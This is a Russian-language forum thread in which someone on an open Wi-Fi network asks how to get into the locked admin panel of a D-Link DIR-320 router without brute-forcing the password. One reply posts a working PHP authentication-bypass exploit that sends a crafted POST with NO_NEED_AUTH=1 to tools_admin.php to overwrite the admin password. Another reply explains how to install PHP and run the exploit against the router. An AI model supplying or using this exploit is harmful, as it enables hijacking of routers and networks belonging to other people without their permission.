Обход авторизации на админку wi-fi Каряво назвал тему, знаю. Вообщем, есть сеть, пасса на подключение к сети не стоит. А вот вход на роутер залочен. Можно ли обойтись без брута пароля ? роутер - D-LiNK DIR-320
в смысле ? я подключаюсь через эту точку, и свободно лажу по сети. а вот на нее (админка) зайти не могу, так как нужен пасс.
Если на Dir-300 стоит старая прошивка, то его можно ломануть сплоитом. Code: <?php if(sizeof($argv)!=4) { echo "Usage: php5 $argv[0] <router ip addres> <port> <admin password>\n"; exit; } $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_PORT, $argv[2]); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=Admin&admin_password1=".urlencode($argv[3])); echo "+ starting request\n"; $out = curl_exec($ch); if($out===false) { echo "- Error: could not connect ( http://$argv[1]:$argv[2]/tools_admin.php).\n"; exit; } else echo "+ request sended\n"; curl_close($ch); if(stripos($out,"login.php")===true) { echo "- something goes wrong (check answer - answer.html) !\n"; $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f); exit; } else echo "+ ok, now you can login using l: admin p:$argv[3]\n"; ?> Как запускать эксплоиты это уже в другой теме)Благодаря этой уязвимости можно послать пост запрос и сменить пароль на свой.
качай какую-нибудь сборку с php (xampp, denver, appserv).Если xampp, при установке оставляешь галочку ток на php.сплоит этот сохраняешь на диске C например как sploit.php.Потом прописываешь в консоли cmd: C:/xampp/php/php.exe C:/sploit.php 192.168.0.1 80 123321 где C:/xampp/php/php.exe - путь до компилятора пхп C:/sploit.php путь до сплоита 192.168.0.1 - ип рутера 80 - порт рутера 123321 пароль который ты хочешь поставить.
